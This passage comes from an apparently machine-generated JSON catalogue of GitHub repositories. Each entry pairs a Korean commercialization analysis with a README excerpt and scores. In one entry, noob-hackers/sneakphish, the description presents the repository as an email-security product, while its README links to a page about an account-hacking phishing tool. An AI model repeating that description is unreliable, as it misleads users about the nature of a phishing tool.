\\*\\*\\*</a><br/>&thinsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href=\"http://missingmigrants.iom.int/\">\\*\\*\\* FATAL ROUTES? \\*\\*\\*</a>\n<br clear=\"left\">\n\n[![Release](https://img.shields.io/github/release/ctubio/Krypto-trading-bot.svg)](https://github.com/ctubio/Krypto-trading-bot/releases)\n[![Platform](https://img.shields.io/badge/platform-unix--like-111111.svg)](https://www.gnu.org/)\n[![g0t0 Counter](https://tinyurl.com/g0t0search)](https://tinyurl.com/g0t0docs)\n[![Code Size](https://img.shields.io/github/languages/code-size/ctubio/Krypto-trading-bot.svg)](https://github.com/ctubio/Krypto-trading-bot)\n[![Software License](https://img.shields.io/badge/license-ISC-551a8b.svg)](https://raw.githubusercontent.com/","composite_score":0.2466,"license_safety_tag":"unknown"},{"name":"firecracker-microvm/firecracker-go-sdk","github_url":"https://github.com/firecracker-microvm/firecracker-go-sdk","stars":6,"language":"Go","license":"Apache-2.0","abandonment_months":3,"description":"# Firecracker Go SDK 분석\n\n## 왜 보물인가\n클라우드 컴퓨팅 회사들이 서버를 더 효율적으로 운영하기 위해 필요한 핵심 기술로, 가상 머신을 초경량으로 관리할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **서버리스 플랫폼 (SaaS)**: AWS Lambda 같은 '클릭하면 코드가 실행되는' 서비스를 만들 때, 고객 코드를 안전하","readme_excerpt":"A basic Go interface to the Firecracker API\n====\n\n[![Build status](https://badge.buildkite.com/de08ca676829bedbf6de040c2c2ba1a5d2892e220997c2abdd.svg?branch=main)](https://buildkite.com/firecracker-microvm/firecracker-go-sdk)\n[![GoDoc](https://godoc.org/github.com/firecracker-microvm/firecracker-go-sdk?status.svg)](https://godoc.org/github.com/firecracker-microvm/firecracker-go-sdk)\n\nThis package is a Go library to interact with the Firecracker API. It\nis designed as an abstraction of the OpenAPI-generated client that\nallows for convenient manipulation of Firecracker VM from Go programs.\n\nThere are some Firecracker features that are not yet supported by the\nSDK.  These are tracked as GitHub issues with the\n[firecracker-feature](https://github.com/firecracker-microvm/firecracker-go-sdk/issues?q=is%3Aissue+is%3Aopen+label%3Afirecracker-feature)\nlabel . Contributions to address missing features are welcomed.\n\nDeveloping\n---\n\nPlease see [HACKING](HACKING.md)\n\nBuilding\n---\n\nThis library req","composite_score":0.2464,"license_safety_tag":"safe"},{"name":"samuelcolvin/pydantic","github_url":"https://github.com/samuelcolvin/pydantic","stars":14,"language":"Python","license":"mit","abandonment_months":0,"description":"# Pydantic 상용화 분석 보고서\n\n## 왜 보물인가\n사용자가 입력한 데이터의 정확성을 자동으로 검증해주는 기술로, 잘못된 정보로 인한 서비스 장애와 보안 문제를 근본적으로 방지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스 - 금융 관리 플랫폼**\n사용자가 입력한 계좌 정보, 거래액, 날짜 등이 정확한 형식인지 자동 검증하여 ","readme_excerpt":"# Pydantic Validation\n\n[![CI](https://img.shields.io/github/actions/workflow/status/pydantic/pydantic/ci.yml?branch=main&logo=github&label=CI)](https://github.com/pydantic/pydantic/actions?query=event%3Apush+branch%3Amain+workflow%3ACI)\n[![Coverage](https://coverage-badge.samuelcolvin.workers.dev/pydantic/pydantic.svg)](https://coverage-badge.samuelcolvin.workers.dev/redirect/pydantic/pydantic)\n[![pypi](https://img.shields.io/pypi/v/pydantic.svg)](https://pypi.python.org/pypi/pydantic)\n[![CondaForge](https://img.shields.io/conda/v/conda-forge/pydantic.svg)](https://anaconda.org/conda-forge/pydantic)\n[![downloads](https://static.pepy.tech/badge/pydantic/month)](https://pepy.tech/project/pydantic)\n[![versions](https://img.shields.io/pypi/pyversions/pydantic.svg)](https://github.com/pydantic/pydantic)\n[![license](https://img.shields.io/github/license/pydantic/pydantic.svg)](https://github.com/pydantic/pydantic/blob/main/LICENSE)\n[![Pydantic v2](https://img.shields.io/endpoint?url=https://","composite_score":0.2462,"license_safety_tag":"safe"},{"name":"cvxgrp/cvxpy","github_url":"https://github.com/cvxgrp/cvxpy","stars":5,"language":"C++","license":"Apache-2.0","abandonment_months":4,"description":"# CVXPY 저장소 분석\n\n## 왜 보물인가\n복잡한 수학 문제를 자동으로 푸는 도구로, 금융·물류·AI 최적화 분야에서 수백억 대 규모 문제 해결에 활용됩니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 자동 투자 포트폴리오 최적화 플랫폼**\n개인 투자자들이 가입하면 자동으로 최적의 주식 조합을 추천해주는 구독 서비스를 운영할 수 있습니다.\n","readme_excerpt":"CVXPY\n=====================\n[![Build Status](http://github.com/cvxpy/cvxpy/workflows/build/badge.svg?event=push)](https://github.com/cvxpy/cvxpy/actions/workflows/build.yml)\n![PyPI - downloads](https://img.shields.io/pypi/dm/cvxpy.svg?label=Pypi%20downloads)\n![Conda - downloads](https://img.shields.io/conda/dn/conda-forge/cvxpy.svg?label=Conda%20downloads)\n[![Discord](https://img.shields.io/badge/Chat-Discord-Blue?color=5865f2)](https://discord.gg/4urRQeGBCr)\n[![Coverage](https://sonarcloud.io/api/project_badges/measure?project=cvxpy_cvxpy&metric=coverage)](https://sonarcloud.io/summary/new_code?id=cvxpy_cvxpy)\n[![Benchmarks](http://img.shields.io/badge/benchmarked%20by-asv-blue.svg?style=flat)](https://cvxpy.github.io/benchmarks/)\n[![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/cvxpy/cvxpy/badge)](https://api.securityscorecards.dev/projects/github.com/cvxpy/cvxpy)\n\n**The CVXPY documentation is at [cvxpy.org](https://www.cvxpy.org/).**\n\n*We are building a C","composite_score":0.2462,"license_safety_tag":"safe"},{"name":"fossasia/support.eventyay.com","github_url":"https://github.com/fossasia/support.eventyay.com","stars":12,"language":"HTML","license":"Apache-2.0","abandonment_months":4,"description":"# fossasia/support.eventyay.com 분석\n\n## 왜 보물인가\n행사 참가자들이 문제를 해결할 수 있도록 도와주는 고객 지원 플랫폼으로, 행사 운영 회사들이 꼭 필요한 핵심 기능을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 행사 주최사들이 월 구독으로 이용하는 온라인 고객 지원 센터\n2. **내부 업무 도구**:","readme_excerpt":"# Event Support FAQ\n\nOn [support.eventyay.com](https://support.eventyay.com) you find support information and answers to frequently asked questions for the [eventyay](https://eventyay.com) platform. If you would like to:\n* get help via chat you can communicate with developers and the user community using our [Telegram](https://t.me/eventyay) channel\n* submit bugs and feature requests use our [GitHub Issue Tracker](https://github.com/fossasia/open-event-frontend/issues)\n* talk to developers and maintainers about development and set up questions use [Gitter](https://gitter.im/fossasia/open-event)\n* help improve this FAQ you can start contributing on our dedicated [repository here](https://github.com/fossasia/support.eventyay.com).\n\n## 1. Support for Organizers \n\n### Setting up Your Event \n\n* [How can I create an event on eventyay?](/event-setup/How-can-I-create-an-event.md)\n* [How can I create an online event on eventyay?](/event-setup/How-can-I-create-an-online-event-on-eventyay.md)\n* [","composite_score":0.2459,"license_safety_tag":"safe"},{"name":"railwayapp/docs","github_url":"https://github.com/railwayapp/docs","stars":281,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.2457,"license_safety_tag":"safe"},{"name":"zalando/postgres-operator","github_url":"https://github.com/zalando/postgres-operator","stars":5,"language":"Go","license":"MIT","abandonment_months":0,"description":"# Zalando Postgres Operator 분석\n\n## 왜 보물인가\n대규모 온라인 쇼핑몰을 운영하는 자란도가 만든 데이터베이스 자동 관리 도구로, 복잡한 데이터 관리 작업을 자동화하여 기업의 운영 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **클라우드 데이터베이스 관리 SaaS**: 중소기업이 자신의 데이터베이스를 쉽게 관리할","readme_excerpt":"# Postgres Operator\n\n![Tests](https://github.com/zalando/postgres-operator/workflows/operator-tests/badge.svg)\n![E2E Tests](https://github.com/zalando/postgres-operator/workflows/operator-e2e-tests/badge.svg)\n[![Coverage Status](https://coveralls.io/repos/github/zalando/postgres-operator/badge.svg?branch=master)](https://coveralls.io/github/zalando/postgres-operator?branch=master)\n\n<img src=\"docs/diagrams/logo.png\" width=\"200\">\n\nThe Postgres Operator delivers an easy to run highly-available [PostgreSQL](https://www.postgresql.org/)\nclusters on Kubernetes (K8s) powered by [Patroni](https://github.com/zalando/patroni).\nIt is configured only through Postgres manifests (CRDs) to ease integration into automated CI/CD\npipelines with no access to Kubernetes API directly, promoting infrastructure as code vs manual operations.\n\n### Operator features\n\n* Rolling updates on Postgres cluster changes, incl. quick minor version updates\n* Live volume resize without pod restarts (AWS EBS, PVC)\n* Databa","composite_score":0.2455,"license_safety_tag":"safe"},{"name":"noob-hackers/sneakphish","github_url":"https://github.com/noob-hackers/sneakphish","stars":6,"language":"HTML","license":"MIT","abandonment_months":12,"description":"# SneakPhish 저장소 분석\n\n## 왜 보물인가\n악의적인 이메일이나 메시지를 탐지하는 보안 기술로, 개인과 기업의 사이버 사기 피해를 직접 막을 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **이메일 보안 SaaS**: 기업의 직원 메일함에 자동으로 설치되어 위험한 이메일을 걸러주는 구독 서비스\n2. **내부 보안 도구**: 대기업의 IT팀이 자사","readme_excerpt":"<p align=\"center\">\n<a href=\"https://www.noob-hackers.com/2020/10/mrphish-tool-for-hacking-accounts.html\"><img title=\"Made in INDIA\" src=\"https://img.shields.io/badge/MADE%20IN-INDIA-SCRIPT?colorA=%23ff8100&colorB=%23017e40&colorC=%23ff0000&style=for-the-badge\"></a>\n</p>\n<p align=\"center\">\n<a href=\"https://www.noob-hackers.com/2020/10/mrphish-tool-for-hacking-accounts.html\"><img title=\"Made in INDIA\" src=\"https://img.shields.io/badge/Tool-sneakphish-green.svg\"></a>\n<a href=\"https://www.noob-hackers.com/2020/10/mrphish-tool-for-hacking-accounts.html\"><img title=\"Version\" src=\"https://img.shields.io/badge/Version-1.0-green.svg?style=flat-square\"></a>\n<a href=\"https://www.noob-hackers.com/2020/10/mrphish-tool-for-hacking-accounts.html\"><img title=\"Maintainence\" src=\"https://img.shields.io/badge/Maintained%3F-yes-green.svg\"></a>\n</p>\n<p align=\"center\">\n<a href=\"https://www.noob-hackers.com/2020/10/mrphish-tool-for-hacking-accounts.html\"><img title=\"sneakphish\" src=\"https://user-images.githu","composite_score":0.2453,"license_safety_tag":"safe"},{"name":"naudio/NAudio","github_url":"https://github.com/naudio/NAudio","stars":5,"language":"C#","license":"MIT","abandonment_months":0,"description":"# NAudio 저장소 분석\n\n## 왜 보물인가\n컴퓨터에서 음성과 음악을 다루는 기술을 간단하게 만들어주는 도구로, 음성 녹음·재생이 필요한 소프트웨어 개발에 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n1. **음성 통화 SaaS**: 팀 협업 도구나 온라인 회의 플랫폼에서 음성 녹음·재생 기능 제공\n2. **기업 내부 도구**: 회사의 콜센터 시스템이나 ","readme_excerpt":"# NAudio\n\n[![GitHub](https://img.shields.io/github/license/naudio/NAudio)](https://github.com/naudio/NAudio/blob/main/LICENSE) [![Nuget](https://img.shields.io/nuget/v/NAudio)](https://www.nuget.org/packages/NAudio/) [![Build](https://github.com/naudio/NAudio/actions/workflows/build.yml/badge.svg?branch=main)](https://github.com/naudio/NAudio/actions/workflows/build.yml)\n\nNAudio is an open source .NET audio library written by [Mark Heath](https://markheath.net)\n\n![NAudio logo](naudio-logo.png)\n\n## NAudio 3 pre-release\n\nNAudio 3 is now available as a pre-release on NuGet:\n\n```sh\ndotnet add package NAudio --prerelease\n```\n\nNAudio 2 remains the stable channel and will receive critical bug fixes if necessary.\n\n**For existing contributors:** the default branch has moved from `master` to `main` to make room for NAudio 3 development. NAudio 2 maintenance now lives on `release/2.x` (formerly `master`). Open PRs that targeted `master` have been automatically retargeted to `release/2.x` — if you","composite_score":0.2453,"license_safety_tag":"safe"},{"name":"awslabs/aws-shell","github_url":"https://github.com/awslabs/aws-shell","stars":9,"language":"Python","license":"apache-2.0","abandonment_months":18,"description":"# AWS Shell 상용화 분석\n\n## 왜 보물인가\n복잡한 AWS 클라우드 서비스를 명령어로 간단하게 다룰 수 있어서, 기술자가 아닌 사람도 클라우드 작업을 쉽게 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: AWS를 사용하는 회사들의 직원들이 월간 구독으로 이용하는 관리 도구\n2. **내부 업무 도구**: 대기업의 IT 부","readme_excerpt":"aws-shell - The interactive productivity booster for the AWS CLI\n================================================================\n\n.. image:: https://aws-developer-blog-media.s3-us-west-2.amazonaws.com/cli/Super-Charge-Your-AWS-Command-Line-Experience-with-aws-shell/aws-shell-final.gif\n\n\nInstallation\n============\n\nThe aws-shell requires python and `pip`_ to install.\nYou can install the aws-shell using `pip`_::\n\n    $ pip install aws-shell\n\nIf you are not installing into a virtualenv you can run::\n\n    $ sudo pip install aws-shell\n\n**Mac OS X (10.11 El Capitan) users**: There is a known issue with Apple and\nits included python package dependencies (more info at\nhttps://github.com/pypa/pip/issues/3165).\nWe are investigating ways to fix this issue but in the meantime,\nto install the aws-shell, you can run:\n``sudo pip install aws-shell --upgrade --ignore-installed six``\n\nOnce you've installed the aws-shell, you can now run::\n\n    $ aws-shell\n\nTo exit the shell, press ``Ctrl-D``.\n\nUpgrading","composite_score":0.2445,"license_safety_tag":"safe"},{"name":"Microsoft/vscode-recipes","github_url":"https://github.com/Microsoft/vscode-recipes","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":2,"description":"# Microsoft/vscode-recipes 분석\n\n## 왜 보물인가\n마이크로소프트가 공식으로 만든 VS Code(개발자용 편집기) 활용 방법 모음으로, 전 세계 수백만 개발자가 참고하는 신뢰도 높은 자료집입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 교육 SaaS**: 초급 개발자용 온라인 강의 플랫폼에서 실습 자료로 판매\n2. **기업 개발팀 ","readme_excerpt":"# VS Code Recipes\n\nA collection of recipes for using VS Code with particular technologies.\n\n## Technology Scaffolding Tools\n\n- [Debugging MERN apps](https://github.com/weinand/vscode-recipes/tree/master/MERN-Starter)\n\n- [Debugging Angular apps with Angular CLI](https://github.com/weinand/vscode-recipes/tree/master/Angular-CLI)\n\n- [Debugging Angular/C# apps with AspNetCore.SpaTemplates](https://github.com/Microsoft/vscode-recipes/tree/master/Angular-SpaTemplates)\n\n- [Debugging Next.js apps](https://github.com/Microsoft/vscode-recipes/tree/master/Next-js)\n\n- [Debugging Meteor apps](https://github.com/Microsoft/vscode-recipes/tree/master/meteor)\n\n- [Debugging Node.js with Nodemon](https://github.com/Microsoft/vscode-recipes/tree/master/nodemon)\n\n- [Debugging React apps](https://medium.com/@auchenberg/live-edit-and-debug-your-react-apps-directly-from-vs-code-without-leaving-the-editor-3da489ed905f)\n\n- [Debugging Vue.js apps ](https://github.com/Microsoft/vscode-recipes/blob/master/vuejs-cl","composite_score":0.2443,"license_safety_tag":"safe"},{"name":"jedisct1/dnscrypt-proxy","github_url":"https://github.com/jedisct1/dnscrypt-proxy","stars":7,"language":"Go","license":"ISC","abandonment_months":0,"description":"# DNSCrypt Proxy 상용화 분석\n\n## 왜 보물인가\n인터넷 사용자의 개인정보를 보호하면서 인터넷 속도를 빠르게 유지할 수 있는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **VPN/프라이버시 SaaS**: 개인 사용자 대상 월 구독형 프라이버시 보호 앱 서비스\n2. **기업 보안 솔루션**: 회사 직원들의 인터넷 접속을 안전하게 관리하는 ","readme_excerpt":"# ![dnscrypt-proxy 2](https://raw.github.com/dnscrypt/dnscrypt-proxy/master/logo.png?3)\n\n[![Financial Contributors on Open Collective](https://opencollective.com/dnscrypt/all/badge.svg?label=financial+contributors)](https://opencollective.com/dnscrypt)\n[![DNSCrypt-Proxy Release](https://img.shields.io/github/release/dnscrypt/dnscrypt-proxy.svg?label=Latest%20Release&style=popout)](https://github.com/dnscrypt/dnscrypt-proxy/releases/latest)\n[![Build Status](https://github.com/DNSCrypt/dnscrypt-proxy/actions/workflows/releases.yml/badge.svg)](https://github.com/DNSCrypt/dnscrypt-proxy/actions/workflows/releases.yml)\n\n## Overview\n\nA flexible DNS proxy, with support for modern encrypted DNS protocols such as [DNSCrypt v2](https://dnscrypt.info/protocol), [DNS-over-HTTPS](https://www.rfc-editor.org/rfc/rfc8484.txt), [Anonymized DNSCrypt](https://github.com/DNSCrypt/dnscrypt-protocol/blob/master/ANONYMIZED-DNSCRYPT.txt) and [ODoH (Oblivious DoH)](https://github.com/DNSCrypt/dnscrypt-resolver","composite_score":0.2443,"license_safety_tag":"safe"},{"name":"unrolled/secure","github_url":"https://github.com/unrolled/secure","stars":8,"language":"Go","license":"mit","abandonment_months":1,"description":"","readme_excerpt":"# Secure [![GoDoc](https://pkg.go.dev/badge/github.com/unrolled/secure)](http://godoc.org/github.com/unrolled/secure) [![Test](https://github.com/unrolled/secure/actions/workflows/test.yaml/badge.svg)](https://github.com/unrolled/secure/actions)\n\nSecure is an HTTP middleware for Go that facilitates some quick security wins. It's a standard net/http [Handler](http://golang.org/pkg/net/http/#Handler), and can be used with many [frameworks](#integration-examples) or directly with Go's net/http package.\n\n## Usage\n\n~~~ go\n// main.go\npackage main\n\nimport (\n    \"net/http\"\n\n    \"github.com/unrolled/secure\"\n)\n\nvar myHandler = http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n    w.Write([]byte(\"hello world\"))\n})\n\nfunc main() {\n    secureMiddleware := secure.New(secure.Options{\n        AllowedHosts:          []string{\"example\\\\.com\", \".*\\\\.example\\\\.com\"},\n        AllowedHostsAreRegex:  true,\n        HostsProxyHeaders:     []string{\"X-Forwarded-Host\"},\n        SSLRedirect:         ","composite_score":0.2442,"license_safety_tag":"safe"},{"name":"4lejandrito/creepyface","github_url":"https://github.com/4lejandrito/creepyface","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":4,"description":"# creepyface 상용화 분석\n\n## 왜 보물인가\n웹사이트 방문자의 눈 움직임을 따라가는 재미있는 효과를 자동으로 만들어주는 도구로, 사용자 경험을 한층 업그레이드할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹사이트 빌더나 노코드 플랫폼에 내장해 사용자가 쉽게 인터랙티브한 웹페이지를 만들 수 있도록 제공\n2. **내부 업","readme_excerpt":"# [Creepyface](https://creepyface.io) &middot; [![GitHub license](https://img.shields.io/badge/license-MIT-blue.svg)](https://github.com/4lejandrito/creepyface/blob/master/LICENSE) [![npm version](https://img.shields.io/npm/v/creepyface.svg?style=flat)](https://www.npmjs.com/package/creepyface) [![Build](https://github.com/4lejandrito/creepyface/workflows/Build/badge.svg)](https://github.com/4lejandrito/creepyface/actions?query=workflow%3ABuild+branch%3Amaster) [![Coverage Status](https://coveralls.io/repos/github/4lejandrito/creepyface/badge.svg?branch=master)](https://coveralls.io/github/4lejandrito/creepyface?branch=master) <a href=\"https://x.com/intent/follow?screen_name=creepyface_io\"><img alt=\"Follow on X\" src=\"https://img.shields.io/twitter/follow/creepyface_io.svg?style=social&label=Follow\"></a>\n\n![The Creepyface logo with a background full of faces looking at the pointer](cover.jpg)\n\nCreepyface is a little JavaScript library that makes your face look at the pointer (or [dance ","composite_score":0.2437,"license_safety_tag":"safe"},{"name":"SpaceVim/SpaceVim","github_url":"https://github.com/SpaceVim/SpaceVim","stars":11,"language":"Vim Script","license":"gpl-3.0","abandonment_months":15,"description":"# SpaceVim 분석 보고서\n\n## 왜 보물인가\n복잡한 코딩 편집기를 누구나 쓸 수 있게 미리 설정해놓은 완성된 작업 환경이라서, 개발자들이 처음부터 어렵게 설정할 필요 없이 바로 일을 시작할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **개발 환경 제공 SaaS**: 웹 브라우저에서 SpaceVim을 클라우드로 제공하는 구독 서비스 (월 $19~","readme_excerpt":"<h1 align=\"center\">\n<a href=\"https://spacevim.org\">\n  <img src=\"https://spacevim.org/logo.png\" width=\"440\" alt=\"SpaceVim\"/>\n  </a>\n</h1>\n\n[Quick Start Guide](https://spacevim.org/quick-start-guide/) \\|\n[Chat](https://chat.mozilla.org/#/room/#spacevim:matrix.org) \\|\n[Documentation](https://spacevim.org/documentation/) \\|\n[Layers](https://spacevim.org/layers/)\n\n[![build](https://img.shields.io/github/actions/workflow/status/SpaceVim/SpaceVim/check.yml?branch=master)](https://github.com/SpaceVim/SpaceVim/actions/workflows/check.yml?query=branch%3Amaster)\n[![Codecov coverage](https://img.shields.io/codecov/c/github/SpaceVim/SpaceVim.svg)](https://codecov.io/gh/SpaceVim/SpaceVim)\n[![Release](https://img.shields.io/badge/Release-2.4.0-8700FF.svg)](https://spacevim.org/SpaceVim-release-v2.4.0/)\n[![GPLv3 License](https://img.shields.io/badge/license-GPLv3-blue.svg)](https://github.com/SpaceVim/SpaceVim/blob/master/LICENSE)\n\n![work-flow](https://img.spacevim.org/workflow.png)\n\n\nSpaceVim is a mo","composite_score":0.2437,"license_safety_tag":"restricted"},{"name":"react-native-community/docker-android","github_url":"https://github.com/react-native-community/docker-android","stars":6,"language":"Dockerfile","license":"MIT","abandonment_months":3,"description":"# react-native-community/docker-android 분석\n\n## 왜 보물인가\n안드로이드 앱 개발자들이 복잡한 개발 환경 설정 없이 즉시 작업을 시작할 수 있게 도와주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 기반 안드로이드 앱 빌드/테스트 플랫폼 (개발자들의 월 구독료 수익)\n2. **내부 업무 ","readme_excerpt":"## Android Docker Image for react native\n[![CircleCI](https://dl.circleci.com/status-badge/img/gh/react-native-community/docker-android/tree/main.svg?style=svg)](https://dl.circleci.com/status-badge/redirect/gh/react-native-community/docker-android/tree/main)\n![Publish](https://github.com/react-native-community/docker-android/workflows/Publish/badge.svg)\n[![Docker Pulls](https://img.shields.io/docker/pulls/reactnativecommunity/react-native-android.svg)](https://hub.docker.com/r/reactnativecommunity/react-native-android) \n\n\n## Motivation\nThis is an implementation of https://github.com/react-native-community/discussions-and-proposals/blob/master/proposals/0036-Official-Docker.md.\n\n## Showcase\nhttps://github.com/react-native-community/ci-sample\n\n## Dockerhub Image\nsee https://hub.docker.com/r/reactnativecommunity/react-native-android/\n\nOriginal version is split from react-native repo, see https://github.com/facebook/react-native/blob/988366a4179d87d667e5d9396efdfba4cbbe0b2e/ContainerShip/","composite_score":0.2436,"license_safety_tag":"safe"},{"name":"Sunnyyoung/WeChatTweak-macOS","github_url":"https://github.com/Sunnyyoung/WeChatTweak-macOS","stars":13,"language":"Swift","license":"apache-2.0","abandonment_months":4,"description":"# WeChatTweak-macOS 보물 분석\n\n## 왜 보물인가\n맥(Mac) 사용자들이 WeChat(위챗)을 더 편하게 쓸 수 있도록 기능을 개선하는 도구로, 중국 연결성이 필요한 기업과 개인들의 업무 효율을 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 맥 사용자를 위한 WeChat 메신저 관리 플랫폼 (메시지 검색, 자동","readme_excerpt":"# WeChatTweak\n\n[![README](https://img.shields.io/badge/GitHub-black?logo=github&logoColor=white)](https://github.com/sunnyyoung/WeChatTweak)\n[![README](https://img.shields.io/badge/Telegram-black?logo=telegram&logoColor=white)](https://t.me/wechattweak)\n[![README](https://img.shields.io/badge/FAQ-black?logo=googledocs&logoColor=white)](https://github.com/sunnyyoung/WeChatTweak/wiki/FAQ)\n\nA command-line tool for tweaking WeChat.\n\n## 功能\n\n- 阻止消息撤回\n- 阻止自动更新\n- 客户端多开\n\n## 安装&使用\n\n```bash\n# 安装\nbrew install sunnyyoung/tap/wechattweak\n\n# 更新\nbrew upgrade wechattweak\n\n# 执行 Patch\nwechattweak patch\n\n# 查看所有支持的 WeChat 版本\nwechattweak versions\n```\n\n## 参考\n\n- [微信 macOS 客户端无限多开功能实践](https://blog.sunnyyoung.net/wei-xin-macos-ke-hu-duan-wu-xian-duo-kai-gong-neng-shi-jian/)\n- [微信 macOS 客户端拦截撤回功能实践](https://blog.sunnyyoung.net/wei-xin-macos-ke-hu-duan-lan-jie-che-hui-gong-neng-shi-jian/)\n- [让微信 macOS 客户端支持 Alfred](https://blog.sunnyyoung.net/rang-wei-xin-macos-ke-hu-duan-zhi-chi-alfred/)\n\n## 贡献者\n\nThis project e","composite_score":0.2434,"license_safety_tag":"safe"},{"name":"yedf/dtm","github_url":"https://github.com/yedf/dtm","stars":23,"language":"Go","license":"BSD-3-Clause","abandonment_months":5,"description":"# DTM 저장소 분석\n\n## 왜 보물인가\n여러 시스템을 연결할 때 발생하는 복잡한 작업들을 자동으로 조정해주는 기술로, 금융·물류·전자상거래 같은 신뢰성이 중요한 산업에서 매우 필요합니다.\n\n## 어디에 쓸 수 있나\n- **결제 처리 플랫폼**: 온라인 쇼핑몰의 결제 후 주문·재고·배송 시스템이 정확히 동기화되도록 하는 SaaS 서비스\n- **은행 간 송","readme_excerpt":"![license](https://img.shields.io/github/license/dtm-labs/dtm)\n![Build Status](https://github.com/dtm-labs/dtm/actions/workflows/tests.yml/badge.svg?branch=main)\n[![codecov](https://codecov.io/gh/dtm-labs/dtm/branch/main/graph/badge.svg?token=UKKEYQLP3F)](https://codecov.io/gh/dtm-labs/dtm)\n[![Go Report Card](https://goreportcard.com/badge/github.com/dtm-labs/dtm)](https://goreportcard.com/report/github.com/dtm-labs/dtm)\n[![Go Reference](https://pkg.go.dev/badge/github.com/dtm-labs/dtm.svg)](https://pkg.go.dev/github.com/dtm-labs/dtm)\n[![Mentioned in Awesome Go](https://awesome.re/mentioned-badge-flat.svg)](https://github.com/avelino/awesome-go#database)\n\nEnglish | [简体中文](https://github.com/dtm-labs/dtm/blob/main/helper/README-cn.md)\n\n# Distributed Transactions Manager\n\n## What is DTM\n\nDTM is a distributed transaction framework which provides cross-service eventual data consistency. It provides saga, tcc, xa, 2-phase message, outbox, workflow patterns for a variety of application scena","composite_score":0.243,"license_safety_tag":"safe"},{"name":"jaywcjlove/mysql-tutorial","github_url":"https://github.com/jaywcjlove/mysql-tutorial","stars":5,"language":"","license":"MIT","abandonment_months":1,"description":"# MySQL 튜토리얼 저장소 분석\n\n## 왜 보물인가\n데이터베이스라는 복잡한 개념을 누구나 이해할 수 있게 정리한 무료 학습 자료이므로, 초보자용 교육 콘텐츠로 가치가 높습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 신입 개발자 대상 온라인 데이터베이스 교육 플랫폼 운영\n2. **내부 업무 도구**: 기업 신입 사원 교육용 인트라넷 학","readme_excerpt":"<div markdown=\"1\">\n  <sup>使用<a href=\"https://wangchujiang.com/#/app\" target=\"_blank\">我的应用</a>，也是对我的<a href=\"https://wangchujiang.com/#/sponsor\" target=\"_blank\">支持</a>：</sup>\n  <br>\n  <a target=\"_blank\" href=\"https://jaywcjlove.github.io/maslink/?id=6758053530\" title=\"Scap: Screenshot & Markup Edit for macOS\"><img alt=\"Scap: Screenshot & Markup Edit\" height=\"52\" src=\"https://wangchujiang.com/appicon/scap.png\"></a>\n  <a target=\"_blank\" href=\"https://jaywcjlove.github.io/maslink/?id=6757317079\" title=\"Screen Test for macOS\"><img alt=\"Screen Test\" height=\"52\" src=\"https://wangchujiang.com/appicon/screen-test.png\"></a>\n  <a target=\"_blank\" href=\"https://jaywcjlove.github.io/maslink/?id=6755948110\" title=\"Deskmark for macOS\"><img alt=\"Deskmark\" height=\"52\" src=\"https://wangchujiang.com/appicon/deskmark.png\"></a>\n  <a target=\"_blank\" href=\"https://jaywcjlove.github.io/maslink/?id=6500434773\" title=\"Keyzer for macOS\"><img alt=\"Keyzer\" height=\"52\" src=\"https://wangchujiang.com/appicon/keyzer.pn","composite_score":0.2428,"license_safety_tag":"safe"},{"name":"hapijs/boom","github_url":"https://github.com/hapijs/boom","stars":5,"language":"JavaScript","license":"NOASSERTION","abandonment_months":19,"description":"# Boom 저장소 분석 보고서\n\n## 왜 보물인가\n웹 서비스에서 발생하는 오류를 일관된 형식으로 관리하고 사용자에게 알려주는 도구로, 서비스 안정성을 높이는 핵심 기반 기술입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 구독형 앱에서 결제 실패, 서버 오류 등을 사용자에게 명확하게 전달하여 신뢰도 향상\n- **내부 업무 도구**: 기업 내","readme_excerpt":"<a href=\"https://hapi.dev\"><img src=\"https://raw.githubusercontent.com/hapijs/assets/master/images/family.png\" width=\"180px\" align=\"right\" /></a>\n\n# @hapi/boom\n\n#### HTTP-friendly error objects.\n\n**boom** is part of the **hapi** ecosystem and was designed to work seamlessly with the [hapi web framework](https://hapi.dev) and its other components (but works great on its own or with other frameworks). If you are using a different web framework and find this module useful, check out [hapi](https://hapi.dev) – they work even better together.\n\n### Visit the [hapi.dev](https://hapi.dev) Developer Portal for tutorials, documentation, and support\n\n## Useful resources\n\n- [Documentation and API](https://hapi.dev/family/boom/)\n- [Version status](https://hapi.dev/resources/status/#boom) (builds, dependencies, node versions, licenses, eol)\n- [Changelog](https://hapi.dev/family/boom/changelog/)\n- [Project policies](https://hapi.dev/policies/)\n- [Free and commercial support options](https://hapi.dev/","composite_score":0.2428,"license_safety_tag":"unknown"},{"name":"dylanslewis/stylesync","github_url":"https://github.com/dylanslewis/stylesync","stars":10,"language":"Swift","license":"MIT","abandonment_months":4,"description":"# StyleSync 상용화 분석\n\n## 왜 보물인가\n디자인 팀과 개발팀이 색상, 폰트 같은 디자인 규칙을 자동으로 동기화하여 일관된 브랜드 이미지를 유지할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 규모 디자인 회사가 월 구독료를 내고 여러 프로젝트의 디자인 규칙을 한곳에서 관리\n2. **내부 업무 